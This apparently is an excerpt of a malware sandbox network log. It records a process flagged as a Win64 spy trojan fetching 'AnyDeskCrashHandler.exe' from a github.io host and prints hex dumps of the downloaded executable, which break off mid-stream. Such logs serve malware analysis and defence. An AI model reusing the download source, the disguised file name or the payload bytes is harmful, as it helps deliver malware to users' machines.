                                                                                                    2024-09-29 00:26:01 UTC1378INData Raw: b0 7f 0d 3c 40 32 c2 25 b8 7f 30 5f c3 ff c8 89 05 bc 18 19 20 16 1f be 87 df 4a b4 75 33 3a 54 ff f4 09 dc 83 be ed 60 dd 25 32 17 00 c6 33 d2 54 cf 6a 1c 16 b0 ff 16 a1 d8 29 84 8b c3 eb a6 80 81 de f0 df b6 66 c4 82 58 20 4c 89 40 18 89 50 9b 48 08 56 57 1b 86 b7 11 9c 40 dc f0 8b fa 9e 05 75 fe 1f 6d f7 0f 39 15 3c 7f 7f 07 96 1e 3e 8d 42 ff 83 f8 01 77 ff 86 c3 d6 9e b0 74 4d 62 05 8d 58 01 eb 08 ff 15 3e dc 15 da dc df 0f 32 d4 30 85 db cf 03 34 d3 ed 0c 1b 2c 8b d7 29 71 00 3c 1a 44 9f 35 0e 49 c0 4e fd 7f 1a 83 ff 01 33 5f 73 dd 75 36 4f 32 1b be 1b 32 61 b2 39 9c 63 f6 4c 41 48 73 00 7b b3 0d 7b 74 0e 23 76 65 85 ff 74 05 3e 6c 77 02 7b 03 75 3c 71 74 25 39 c6 e0 ad 93 6d c3 06 10 27 3e 26 b5 eb 68 1e 0a ef 06 33 db 07 28 80 78 40 1e 96 51 58 b3
                                                                                                    Data Ascii: <@2%0_ Ju3:T`%23Tj)fX L@PHVW@um9<>BwtMbX>204,)q<D5IN3_su6O22a9cLAHs{{t#vet>lw{u<qt%9m'>&h3(x@QX
                                                                                                    2024-09-29 00:26:01 UTC1378INData Raw: b8 40 83 04 df ae b9 03 2d de b1 37 b9 50 b7 f6 41 b8 d0 04 10 cb fc 0e 47 e0 86 d9 2c 55 61 9d e8 3f 95 d8 de 08 98 70 1c 17 41 43 19 b1 d8 c3 ea 47 3c d1 8d e0 1d 24 af b7 69 59 d5 dc 8d e8 18 d7 b1 27 ba 58 59 08 20 64 0a 5a 7b 0d 1e e7 85 c8 04 d2 03 66 88 41 8c b6 d8 14 8b 98 cb 17 c1 86 fd 33 85 88 00 96 31 34 d8 ce d1 6d 60 c7 03 50 15 16 07 54 01 db 6f 03 2d dc 0e 53 27 3e 8d 44 50 b3 db f7 13 3d 8d 45 f0 08 48 1c a9 d4 69 c0 d4 61 b6 40 0a 96 7a 0d 65 78 8b 50 d8 bb 8d e3 02 5a 9c 24 d0 49 e8 b3 60 29 30 c4 5d c3 fb e4 7e 70 13 1c 1d eb 55 c5 3d e4 06 be db e7 a8 f4 55 fb 06 49 8c d6 a3 c3 61 a7 49 5f 3b df 72 e9 95 8b 3b 21 43 72 72 bf b8 50 7a 06 be 08 4f c2 2c 43 30 02 87 ce 26 55 f3 ef 10 fe 5b e3 ad 7b de 0f a2 44 d6 02 d2 41 81 f2 69 6e 65
                                                                                                    Data Ascii: @-7PAG,Ua?pACG<$iY'XY dZ{fA314m`PTo-S'>DP=EHia@zexPZ$I`)0]~pU=UIaI_;r;!CrrPzO,C0&U[{DAine
                                                                                                    2024-09-29 00:26:01 UTC1378INData Raw: 35 c9 80 63 9d 78 48 8b ff e2 d3 07 2f bc 7d d4 34 07 50 58 eb 52 39 1a 74 82 04 8b 0b 5d 52 3a d2 4f 8d 42 45 6a b1 dd 2e 58 eb f6 33 63 02 6d c1 b6 2e b4 8d df 10 7c 16 4c 63 4a 26 63 26 9d 0c 09 06 6f 2c dc 0b 04 0a cf c1 a7 c0 c3 cc d7 b7 f6 bb 03 8b 39 5a 81 3f 52 43 43 e0 52 07 4d 4f 3a f6 af 34 0a da 74 22 eb 13 74 83 78 83 2d 62 97 a6 7e 08 0a 88 30 e3 dd b3 19 1c 33 c0 e5 94 89 78 48 5b 8c 54 0b 66 21 e8 33 b8 2d 90 e2 25 4b 45 b8 1f 85 91 60 94 0f 8f 89 70 db 74 78 d3 18 44 52 10 49 c7 c1 62 31 13 7c 29 44 08 49 11 7a 33 c3 d5 a7 0b 3f ad ce c1 15 7e 1c 89 b1 18 b0 7a c2 74 23 69 89 8e d9 09 be fb 3b 48 10 72 06 05 08 76 07 b9 0d da 49 2f 54 38 bc af 8d af 8c 20 7d 01 18 33 b6 72 28 93 05 8d 0a a3 0d fc 84 8b 8b 0d 74 6c 4d f9 ff e5 3d 65 b6 5d
                                                                                                    Data Ascii: 5cxH/}4PXR9t]R:OBEj.X3cm.|LcJ&c&o,9Z?RCCRMO:4t"tx-b~03xH[Tf!3-%KE`ptxDRIb1|)DIz3?~zt#i;HrvI/T8 }3r(tlM=e]
                                                                                                    2024-09-29 00:26:01 UTC1378INData Raw: 61 18 10 bc 95 82 c0 6e 18 a7 3f 40 60 73 45 42 e0 c0 13 68 87 05 2c d8 92 a3 4b 60 ff 45 a8 c9 80 17 68 0f 88 40 0d 34 1c 68 37 70 e9 68 20 52 5c 27 59 08 43 4a 08 92 3d 58 a4 45 4b 8b 5d 38 40 2e da a2 c1 7a 4f 0a cf 5a 89 96 6e 8a 11 59 03 50 60 e1 88 90 d2 17 07 c3 75 8d 34 20 fb 7d 0a d2 2e 30 2d f4 aa a7 8b 74 1b 48 4a 02 f8 a7 20 8a ad 6e f0 42 c2 3d 1b d4 99 49 83 14 c6 b7 57 af 4d 86 c6 05 84 ff c8 a1 98 7b e0 d3 d6 90 2b c6 9f 1c ae 2d 85 08 de 1d 8f bd b0 4d 3b c1 11 a6 8b 75 3c 9c f7 b0 26 df 1e db 1e 63 0b 2b de 22 ed eb 6b 48 bc f7 98 02 c1 ad b6 13 50 22 cf 61 00 08 ae 0e 12 77 f0 a5 c4 00 8d 75 7e 7f 81 fb 97 70 0d 2e 57 75 2d 44 8d 43 07 25 83 52 31 d8 dc dc d6 cc 96 cc 56 a2 98 ab 16 cc 3d b7 37 d8 66 b7 5d 46 10 c6 af 6b d3 87 84 7b b1
                                                                                                    Data Ascii: an?@`sEBh,K`Eh@4h7ph R\'YCJ=XEK]8@.zOZnYP`u4 }.0-tHJ nB=IWM{+-M;u<&c+"kHP"awu~p.Wu-DC%R1V=7f]Fk{
                                                                                                    2024-09-29 00:26:01 UTC1378INData Raw: 02 9c ee 49 5a 83 60 1a 0f 33 b0 33 d1 55 ac 15 f7 0b 34 80 ae 6d 3a 52 c7 27 e2 aa 27 be 31 72 97 dd 76 6c 2a 46 de 45 c8 03 7d c0 e0 27 5d c8 da 90 55 09 e0 1a 7f ea 08 df b6 0c 84 86 09 26 85 8b 85 a1 8d 55 05 db 42 45 c7 e1 e0 53 ce 4a ed b6 7a 43 6f c6 70 18 14 32 6e 6f 4b d5 13 cf c1 03 73 d8 08 04 7e c0 be f0 fe a6 ce 4d d0 3b 45 f8 0f 83 40 67 7d d8 66 49 4e 2d 74 d4 16 fb 4d 38 8b fe d5 36 01 df 4e 63 50 10 41 81 0c 80 b6 68 d0 de 68 66 98 04 8a 41 46 ca 97 7a db 05 43 00 10 26 b8 45 7a 45 a8 77 ad ae a1 41 4a 8f 44 78 87 11 48 c1 e8 e0 c6 ec 56 3f 3b f0 11 70 4e 08 bd 2d 36 5b fd e4 74 1d 37 98 21 ae 83 27 d0 e9 90 2a 26 68 2b a4 57 ac db 12 b8 81 4b 4a 81 5a 45 10 5a d8 6e 3b 18 4b 6c c0 04 87 51 0c 48 c2 f6 cd 2d fb 91 70 18 14 b4 2c 10 eb 31
                                                                                                    Data Ascii: IZ`33U4m:R''1rvl*FE}']U&UBESJzCop2noKs~M;E@g}fIN-tM86NcPAhhfAFzC&EzEwAJDxHV?;pN-6[t7!'*&h+WKJZEZn;KlQH-p,1
                                                                                                    2024-09-29 00:26:01 UTC1378INData Raw: db 08 4e 55 38 4f 30 84 2c 35 be d4 62 51 ff 03 d2 74 40 05 11 a8 30 15 e1 09 ed 8b 84 0c 28 a8 8f 1c 3d 30 76 a4 a0 31 52 34 cc 1b d9 cf 7b c2 a7 25 78 12 6b c2 b4 10 3e ab cc 45 0a 06 2d 81 3d 47 ec 16 09 17 40 61 37 8a 84 62 d5 ce 45 62 88 66 3b 88 23 3c ad 68 c5 61 dc 60 de ac ea ba 6a c5 6b 18 b0 25 7b 62 e3 c5 86 c6 90 8a 37 22 2b bc 1a de 0d 18 6f 48 80 8d 0d cd c5 b4 57 4b 35 b6 2e a3 0b 0c 53 55 88 08 9b 82 53 5b b4 02 d9 dc e0 c5 62 1b 52 7c b3 03 b1 05 61 b1 dd d8 26 dc 05 d8 17 41 2e 05 bd 0a 42 a6 6c 07 91 c1 c3 5b 71 90 6d 59 b1 03 43 49 18 48 b5 7b 83 c1 08 a5 36 5c 1f bb df 01 23 cf 05 1f 29 8b f9 2c 8b da 11 5e fa 7c 2e e8 f6 c3 56 0d ba 18 29 08 06 e9 47 69 ca 44 41 c7 81 d4 65 c9 d5 00 40 be 0f 16 fa a2 f7 f9 ad ff 77 4d 1c eb 02 94 21
                                                                                                    Data Ascii: NU8O0,5bQt@0(=0v1R4{%xk>E-=G@a7bEbf;#<ha`jk%{b7"+oHWK5.SUS[bR|a&A.Bl[qmYCIH{6\#),^|.V)GiDAe@wM!
                                                                                                    2024-09-29 00:26:01 UTC1378INData Raw: 3b 4c a1 c3 58 0c fa df 03 35 6d a9 b8 fd 6d ba 2b da 56 96 3e f1 85 3d 03 ab 54 b0 95 50 0f 75 df 37 3e 7f 33 58 37 53 25 43 14 30 52 5e 47 27 05 d3 7d b0 ce 2d bf c2 b7 0b 47 eb d9 33 c0 58 0a de 81 49 b8 b5 df 03 99 a0 42 83 8e a8 76 e8 18 1c 61 d3 f2 4e 4d a8 70 d1 20 b4 86 e1 1f de de 3d b1 d0 55 02 81 9d 49 45 0d 39 38 74 04 5b 73 d5 2a ce 0c 72 f3 7b e3 5b 20 78 3a e4 1c 40 08 4d 08 be 11 7c a9 db fa f8 05 75 0a 3f 08 41 8d 40 5d 54 e8 b6 e1 cd 0f 01 65 b3 c2 89 16 d8 6d 33 6b 86 73 08 a7 04 aa ab 8d 30 f4 39 2a a0 16 91 7a bd b9 ee f6 eb 08 33 49 08 10 10 fa 6b 81 38 8d 66 5b 68 b4 13 c0 a1 e2 7a 0a 8e cb b3 3c db 74 6b 07 8f 5c 90 4d 91 3c cb b3 3c 3e 92 2f 93 20 6f 99 a5 b9 b4 02 11 b5 9b 75 40 ba 9f 9f bf bf 8d 60 36 ba 8e 06 2f ba 85 28 ba 8a
                                                                                                    Data Ascii: ;LX5mm+V>=TPu7>3X7S%C0R^G'}-G3XIBvaNMp =UIE98t[s*r{[ x:@M|u?A@]Tem3ks09*z3Ik8f[hz<tk\M<<>/ ou@`6/(
                                                                                                    2024-09-29 00:26:01 UTC1378INData Raw: 15 42 0c 42 c3 ea 58 29 a4 8b c7 d7 c2 b2 88 55 84 4f 7e e1 2b 0c b7 49 3d 41 50 73 4f 62 45 18 6c 17 04 70 e4 fd 0c 5f 08 3d 7b a2 46 a2 31 b1 40 34 1a 77 6e bb a3 0d eb 0e 48 d6 1c 3c 06 fd 52 01 2c ba 59 b0 00 2b 26 bd c7 7b 83 10 56 0c 77 be df 80 12 80 a8 ae 8a 16 eb 25 1f aa 25 e8 80 fa 3d 3e 01 9b 8b c8 d0 68 81 1e 74 14 41 72 dd 96 6a 34 d5 f6 c0 60 03 0c 8a 10 c3 d8 b0 41 50 d7 02 ba 08 70 b7 2e d8 60 ab 0b 7f c8 72 4f f3 8a 68 6b b6 a6 06 59 5f 43 cd c5 42 2e 60 27 fc f6 b5 08 3c 3d 74 35 ba ea cd 3c 46 4f f0 c0 f8 19 25 30 d5 bf 3b 4b 5d 1b 4a 50 47 f6 3e d5 76 b0 67 3f 03 f5 eb ac da 41 44 69 eb 8d f2 9d a7 07 48 95 40 5b 48 08 f5 c1 34 65 7c 75 5e c3 e6 3e 4e 18 82 d1 5d d2 78 4c 18 45 82 57 17 01 a8 e5 66 8f f9 eb 0f 83 54 c5 19 0d e1 6b 71
                                                                                                    Data Ascii: BBX)UO~+I=APsObElp_={F1@4wnH<R,Y+&{Vw%%=>htArj4`APp.`rOhkY_CB.`'<=t5<FO%0;K]JPG>vg?ADiH@[H4e|u^>N]xLEWfTkq
                                                                                                    2024-09-29 00:26:01 UTC1378INData Raw: 99 36 01 0d 89 90 28 f6 77 d8 a8 03 17 88 b5 8d 4a 42 0d 54 37 bb dd e1 28 66 11 bc 00 1c 0a c2 d2 9f 29 e0 ac ae 1d 83 a0 a0 94 bd 9d eb 0e 48 70 9c d0 97 84 55 d4 20 b2 a8 48 f0 14 f0 53 7f 09 bd 24 e8 1a 53 4a 8c 0b 37 58 24 28 6f f3 40 c7 5f 88 67 5d e8 f7 e8 d3 15 84 63 b8 05 00 00 71 0b d8 65 ed e8 e5 d7 45 e4 dd 4d 42 8f b9 c2 74 0c 6f 8b 3c 8b 49 70 81 1c c8 81 0c 58 60 c8 81 1c c8 68 48 50 81 fd 80 1c 78 89 80 00 00 00 0f 06 e1 10 e4 c0 03 a3 06 28 d0 34 dd 41 49 38 14 e0 f8 e4 56 34 41 87 1b b0 c6 5d 13 c1 f8 15 43 f9 fd 89 90 38 1b c5 ba ba 2c 29 89 5a 8f 10 00 31 cf 68 a2 9a 50 17 df 3a 41 0b 83 57 1f 14 82 79 eb 44 87 9f 38 48 d4 59 9f 37 db b4 87 3c ea 49 54 c2 53 ff 94 34 67 c5 6e 0c 95 2a 21 74 f4 14 1d 66 c7 c8 6c 17 7c d4 74 fc 3e 60 25
                                                                                                    Data Ascii: 6(wJBT7(f)HpU HS$SJ7X$(o@_g]cqeEMBto<IpX`hHPx(4AI8V4A]C8,)Z1hP:AWyD8HY7<ITS4gn*!tfl|t>`%


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.649711185.199.110.1534432404C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-09-29 00:26:01 UTC73OUTGET /file/AnyDeskCrashHandler.exe HTTP/1.1
                                                                                                    Host: duy-thanh.github.io
                                                                                                    2024-09-29 00:26:01 UTC736INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 60416
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: application/octet-stream
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-ec00"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:01 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: 83DB:34E664:2A39397:2F0A3FE:66F89E99
                                                                                                    Accept-Ranges: bytes
                                                                                                    Age: 0
                                                                                                    Date: Sun, 29 Sep 2024 00:26:01 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    X-Served-By: cache-ewr-kewr1740032-EWR
                                                                                                    X-Cache: MISS
                                                                                                    X-Cache-Hits: 0
                                                                                                    X-Timer: S1727569562.795317,VS0,VE30
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: 0e9f5c2e20e330cf847b611cef2d61c27bfd4cfc
                                                                                                    2024-09-29 00:26:01 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f7 82 bf a3 b3 e3 d1 f0 b3 e3 d1 f0 b3 e3 d1 f0 f8 9b d2 f1 b6 e3 d1 f0 f8 9b d4 f1 3f e3 d1 f0 f8 9b d5 f1 b9 e3 d1 f0 a3 67 d2 f1 ba e3 d1 f0 a3 67 d5 f1 a3 e3 d1 f0 a3 67 d4 f1 98 e3 d1 f0 f8 9b d0 f1 b6 e3 d1 f0 b3 e3 d0 f0 d3 e3 d1 f0 fb 66 d8 f1 b2 e3 d1 f0 fb 66 2e f0 b2 e3 d1 f0 b3 e3 46 f0 b2 e3 d1 f0 fb 66 d3 f1 b2 e3 d1 f0 52 69 63 68 b3 e3 d1 f0 00 00 00 00 00 00 00
                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$?gggff.FfRich
                                                                                                    2024-09-29 00:26:01 UTC1378INData Raw: 6f 8b 8d 8c a3 7a cc d7 4c c4 c4 ec da b7 7f c3 40 55 41 55 8b ac 24 f8 fe 3e d8 08 02 d9 dc 41 8e 56 ad 85 e8 24 41 46 42 3b 76 1b c8 28 95 80 0f 9e ff 05 09 e1 ed fe db e8 ba 4d 85 ed 75 06 c7 00 2a 15 83 bd 1b 4d 1b 6b bf 76 89 9c bb 45 89 b4 cb 07 bc d7 de 2d f2 5d 07 4c 89 a4 24 00 17 f8 01 07 bf 63 b6 db 17 f0 07 7d 0b 3e 5a 05 cd 44 0f b7 1d ff dd ed db b6 78 15 41 bf be 85 12 b8 93 04 66 44 89 7d 60 66 41 33 c7 ff 7e f7 df be c6 0d 89 45 62 b9 92 08 41 8d 47 01 ba b0 11 33 c8 41 b8 bd 6d b7 93 a8 02 1e 4d 64 10 d0 a7 8d 88 00 77 43 bb 8c 11 03 55 66 42 63 8d 55 62 0f 5b ec f7 5d 04 4e 45 68 41 b9 a6 30 ba c3 5f 40 bb ed 74 bb b3 c4 08 db 1d 4d 6a 83 34 2d 75 bb b3 bb 05 13 d0 bf c5 5c 06 1c 55 6c 11 d8 bb ed e4 b6 61 df 23 3d 12 07 0d fe 19 5d 6e
                                                                                                    Data Ascii: ozL@UAU$>AV$AFB;v(Mu*MkvE-]L$c}>ZDxAfD}`fA3~EbAG3AmMdwCUfBcUb[]NEhA0_@tMj4-u\Ula#=]n
                                                                                                    2024-09-29 00:26:01 UTC1378INData Raw: 27 7b 9a 57 e4 61 15 a8 55 d4 90 6e 93 34 4d ac 2b 78 00 f2 83 74 9b 6c 39 15 b0 f1 65 00 f9 25 1b ac db 64 15 b4 3f 02 00 00 11 15 6b d9 60 05 00 04 0e 00 5c d2 4c f6 f7 6f 0e e0 ea e2 5c d2 5c d2 dd e4 d0 e6 5c d2 5c d2 c3 e8 b6 ea 5c d2 5c d2 a9 ec 9c ee 5a d2 5c d2 8f f0 82 97 3d 2d 7b fb 75 0e fb 68 0e f6 97 34 97 34 5b f8 4e fa 96 34 97 34 41 fc 34 4b 9a cb 9e fb 27 0e 00 1a 4b 9a 4b 9a 02 0d 04 00 b2 a7 24 9b 06 f3 6e fb e6 0e 49 73 d9 d3 fb d9 0e 0c cc 49 73 49 73 0e bf 10 b2 49 73 49 73 12 a5 14 98 49 73 49 73 16 8b 18 7e 3b 71 49 73 1a 71 1c f1 0e 69 2e 69 2e 1e 57 20 4a 69 2e 69 2e 22 3d 24 30 69 2e 69 2e 26 23 28 16 6c 2e 69 2e 2a 09 2c fc 6d e0 b2 03 93 2e bd 0e 30 cb 0e 5c 76 bd 0e 32 bd 0e 3b 70 d9 81 34 bd 0e 36 bd 0e c0 65 07 2e 38 bd 0e
                                                                                                    Data Ascii: '{WaUn4M+xtl9e%d?k`\Lo\\\\\\Z\=-{uh44[N44A4K'KK$nIsIsIsIsIsIsIs~;qIsqi.i.W Ji.i."=$0i.i.&#(l.i.*,m.0\v2;p46e.8
                                                                                                    2024-09-29 00:26:01 UTC1378INData Raw: 0a 12 45 d4 41 8d 50 02 8d c8 61 67 7f 8b 03 ff 15 e9 e9 fe a0 2b 14 75 5f 5c 08 8b 8b 0b 28 24 04 20 4b 8d 1f 1c e0 b5 65 68 44 46 db c0 ec 1a bb 02 0b 89 23 d7 7a 13 02 8c 0f 8d bb 23 d0 21 3c 33 50 40 84 8d 6f 4f cb 6e 7c b7 08 22 b1 01 4a f0 1c eb 19 21 45 8e 63 dd 36 80 a6 00 23 4e f8 37 d9 80 f0 b4 88 40 54 5f 8c 90 0a 9e 6d 11 63 b4 ab 90 07 18 90 8c 83 f0 12 9f 1e 70 88 17 d8 f3 db c7 ad 05 d8 d5 f3 e6 a7 cb 08 e2 b4 78 6c 33 05 ec 0e c8 ba 09 d5 e5 2e 50 38 d0 f6 70 25 e0 13 f7 6e 29 09 3f 77 08 3e 38 b9 17 00 2f dd 31 1a dc cc 1b 7c 07 c1 cd 29 e8 3a f4 13 b5 df a2 01 8d 1b 94 46 b6 05 21 a3 72 dd 42 ef ae 0b 88 08 0f b1 20 ee b9 bd 25 43 0a 16 0d 7b a1 44 d7 7b 6e c1 6d 0b 7f 19 a8 55 11 7e 09 07 d9 0e 66 4f f0 09 59 b8 08 d8 bf 87 0f ff 6b c0
                                                                                                    Data Ascii: EAPag+u_\($ KehDF#z#!<3P@oOn|"J!Ec6#N7@T_mcpxl3.P8p%n)?w>8/1|):F!rB %C{D{nmU~fOYk
                                                                                                    2024-09-29 00:26:01 UTC1378INData Raw: 16 ec 95 c0 6b 18 c9 0f d7 5f f6 5f c6 de 7f ab 2e 21 4f 8b 40 f9 81 3b 63 73 6d ab fe ff ff e0 75 1c 83 7b 18 04 75 16 8b 53 20 8d 82 e0 fa 6c e6 83 f8 02 76 15 2f e8 10 5c 6a 40 8b 74 0d 4f d5 d2 57 c7 2f 20 5f d3 2d 90 89 04 4f e6 db fc 5f 08 0b 30 fb c4 bb 0f 3c 21 ab 1d 53 66 fb 3d 4c 06 eb 12 fc d8 3e 43 8f dc 06 e7 54 16 83 c3 04 11 82 2f b3 3b df 72 e9 a8 4e 26 6c 20 a5 43 1f 18 7a 21 64 48 10 3b b4 b3 ee 6a e6 74 1c 57 41 56 1f 10 b7 fd b7 85 2e 5e 0f a2 d8 c1 02 d2 41 81 f2 69 6e 65 49 d4 36 43 bf 06 f0 6e 74 65 6c ec 02 f0 1d ff e6 7a 8b 9e 22 45 0b d0 21 1b f1 47 65 6e 75 89 5d bd fd c2 b7 f4 0f d1 89 4d f8 21 89 55 fc 75 5b 49 0d 79 8d dd 16 ad 77 c0 25 f0 3f ff b9 03 61 0c 00 c2 1b b4 b7 80 02 3d c0 06 08 3a 3d 60 06 9c 17 fe 77 83 cb 3d 70
                                                                                                    Data Ascii: k__.!O@;csmu{uS lv/\j@tOW/ _-O_0<!Sf=L>CT/;rN&l Cz!dH;jtWAV.^AineI6Cntelz"E!Genu]M!Uu[Iyw%?a=:=`w=p
                                                                                                    2024-09-29 00:26:01 UTC1378INData Raw: 0e 12 d3 7d a6 db d8 20 0f 40 1e 50 0f 40 3a 07 dd 4c 60 0b 10 88 ea 12 60 6f 3b db 64 a3 80 90 0e 70 03 89 19 d6 88 ee 6d 69 81 11 68 64 6f a5 35 75 5d dd 0b 7a 8f 25 4f 07 9f 60 5f 5b f3 5d d7 07 a7 0f 57 07 b7 0f b6 45 7f c7 26 42 1c 5c e8 de 40 48 fc 08 28 18 4d 97 3a 9a 70 51 d8 06 45 b6 d4 8d 55 f1 8f 14 17 a4 8b 12 ef c7 45 cf 20 05 93 19 5b 52 f0 bb 88 1e d7 df 4d 0f a3 f2 27 1d 90 e2 5d eb 89 11 e2 3b 0d 71 69 f6 58 58 73 0b 0a 45 58 eb 4d 89 2c 29 da d9 4b 08 10 89 1b 0e e4 83 1d 58 4b f9 3c 78 58 75 35 13 5b 47 1b 50 2b 16 27 08 5a a9 60 df 3a 75 fa 74 0a f0 23 74 16 eb ed 4c 28 08 49 22 bc 95 16 2c 7e c1 db 3f 40 60 d0 13 b9 81 00 07 68 cb b7 c0 06 56 87 4b 60 9b 17 a9 a1 2b 5e 30 0d 8b d6 58 1c 42 24 68 a0 68 37 70 89 27 88 8e 9a e9 59 08 07
                                                                                                    Data Ascii: } @P@:L``o;dpmihdo5u]z%O`_[]WE&B\@H(M:pQEUE [RM'];qiXXsEXM,)KXK<xXu5[GP+'Z`:ut#tL(I",~?@`hVK`+^0XB$hh7p'Y
                                                                                                    2024-09-29 00:26:01 UTC1378INData Raw: f1 b6 84 0b 87 88 72 32 c0 23 7c e8 fe 2d df a2 3b f9 0c 4b 90 83 0d 91 0f ff e9 d4 7f 49 90 23 4d 63 48 1c 4d 6f 1c 96 1a db 46 3b 01 67 fe 6c 04 02 02 b3 8f 16 fb ca 43 88 28 ab 82 54 c7 6b 4d 14 d8 af d1 10 4b 15 64 04 1c d8 40 d7 40 32 b8 58 08 04 53 97 1c 4c db 12 78 21 b3 04 02 c3 8f 5b f9 97 53 16 73 39 41 3e 3b 7c 7e 04 eb 02 16 b8 89 05 3a 84 e9 81 81 8d c3 d9 7b 49 6c 10 52 ed d8 68 81 76 59 18 19 f9 4b 93 1a 9e 0c dd 78 7d 41 c6 41 14 2a 46 30 ba 70 a1 df 14 0c cb 4a 63 14 a3 03 d2 cd da 72 ea 8d 4a 35 ee 83 59 c8 72 e8 53 47 37 7a 9b 13 54 49 ff e8 ca 49 18 17 28 58 18 ad ea eb f5 38 1c d6 48 62 c3 f4 30 bf 75 65 2a 1c d6 a7 f2 77 e9 33 ff 41 39 de 76 ad f0 78 04 74 0f 34 05 38 2a 4c 51 14 07 eb 2e b4 52 25 b5 2f 87 f2 85 d2 14 5b 68 bf bb 34
                                                                                                    Data Ascii: r2#|-;KI#McHMoF;glC(TkMKd@@2XSLx![Ss9A>;|~:{IlRhvYKx}AA*F0pJcrJ5YrSG7zTII(X8Hb0ue*w3A9vxt48*LQ.R%/[h4
                                                                                                    2024-09-29 00:26:01 UTC1378INData Raw: d0 86 d2 e6 46 0e e0 c2 b0 40 36 d9 4d 80 e2 84 13 1e d6 8b d6 6f 8a 8d 0b c8 03 ab 14 2f 57 e2 2c e4 27 d4 d6 3a ea 48 5b 40 fa 11 38 e3 8b 95 73 4d 32 cb 15 20 e8 e9 fd e3 d6 31 eb 3d 99 76 37 80 bd 45 82 ea 30 a1 14 27 30 5e ba 86 c3 f6 6f 0e c7 29 5d 44 52 28 2c e9 20 9c 27 2b 3b 54 51 2d 21 16 0c b8 29 18 3f d9 ad cb 7a 5b 83 5b 84 b2 01 cc 2a b8 a0 e1 2b ec f2 a8 03 82 f8 3b d8 17 85 f4 5b 01 00 0f 2d 50 3c 6d c4 cc 77 87 14 0c 24 f2 4c d7 89 48 28 13 70 88 64 1c 07 68 03 81 af 2f 99 18 96 10 a7 4c 25 fa c0 81 ec a2 81 39 2b 0d 3e c4 82 06 9e e0 3b 8b 3d a0 6e ae 6d c4 53 8e ac d1 a0 07 bc 24 61 3b db 04 04 07 20 ca 10 88 7b 50 3b 6a 5b 70 33 c5 a3 82 7d c0 5b 3c 39 58 42 45 81 3e fa 3d 2e d0 9e a0 07 0a 35 1d aa 38 01 d8 60 28 1d 28 93 11 28 c4 48
                                                                                                    Data Ascii: F@6Mo/W,':H[@8sM2 1=v7E0'0^o)]DR(, '+;TQ-!)?z[[*+;[-P<mw$LH(pdh/L%9+>;=nmS$a; {P;j[p3}[<9XBE>=.58`(((H
                                                                                                    2024-09-29 00:26:01 UTC1378INData Raw: 9f 39 41 28 04 03 2c 52 b3 1d f9 2d 33 75 2c 27 49 c8 fb bb 41 6b b4 27 c7 12 87 75 19 93 17 70 28 1e c7 40 40 0e 34 11 e2 04 b1 35 60 e5 28 14 c9 e2 44 89 4c c7 a2 01 03 f0 c2 7d 30 45 6b 16 88 30 18 bc da 4c 8b f9 50 e8 b6 53 3c ab 0f 4d d3 a2 31 e4 7d af 56 5a a2 79 40 e9 ea 0d f5 f7 de b7 45 e7 3b fc 0f 8e 08 11 08 9a 3b 7e 18 b0 41 8b 89 08 0e f7 71 82 c4 b7 38 08 4a 03 f0 8b 3c 01 2b 09 6b e2 cb 13 83 7c 01 bf 1c 13 88 1d 0c 6e 07 5c 01 bd 03 c3 c2 d8 2f 18 6d 89 59 44 8d 89 32 38 44 01 0e 85 55 65 12 80 e0 11 18 e3 c8 99 49 1c 2a 74 eb 12 23 2d 61 4a b8 88 38 b4 e7 3d 3e 1a 20 7c 70 45 28 53 ad 2c da d5 b3 24 1d 44 6b 80 0b db d0 c0 f4 9e 02 7f 24 9e 05 33 92 05 c6 03 0c 24 60 80 b7 e7 c0 03 b7 12 df 3c f8 49 ee f2 26 75 02 1e 0a 6d 82 25 9b 14 06
                                                                                                    Data Ascii: 9A(,R-3u,'IAk'up(@@45`(DL}0Ek0LPS<M1}VZy@E;;~Aq8J<+k|n\/mYD28DUeI*t#-aJ8=> |pE(S,$Dk$3$`<I&um%
                                                                                                    2024-09-29 00:26:01 UTC1378INData Raw: c3 54 28 cc 97 d1 0f fc 02 10 5c 84 98 15 2d b2 30 b3 35 5e be 97 0a 2a 81 49 08 dc 57 23 f3 0e 3f 8a 2f 2a d4 70 74 3c f0 70 08 03 ab e8 2b 94 ef eb 14 e0 70 2a e0 15 43 7e 08 d3 42 26 48 54 43 15 a1 c6 7b 38 b6 bd 4a 51 a9 6b 4c 24 21 29 17 18 80 b3 05 15 7b 90 15 ec f7 37 e9 7b 5a 5e 9b 87 01 a2 7e b4 b3 2c 42 d5 6d 1d 46 07 0f 4c 26 90 1f b0 89 85 62 d4 cd 6c c3 ba 1d 2c 04 ed 0c 59 21 ff e0 4d 94 8b 74 8f 60 1e 0c 01 97 37 78 b1 19 8e 0e c7 00 05 cd 69 77 ab 8f 60 69 d1 d2 05 8b 41 75 21 b7 e9 0e 43 71 c8 b8 92 6f 2b c1 8a 05 0c c0 dd 7e d3 ca 49 33 d0 5f 15 6d 1d ac 41 b0 36 3b c4 4b 5e 58 61 85 89 19 1f 68 16 78 8b 31 20 a7 22 4a 41 0f 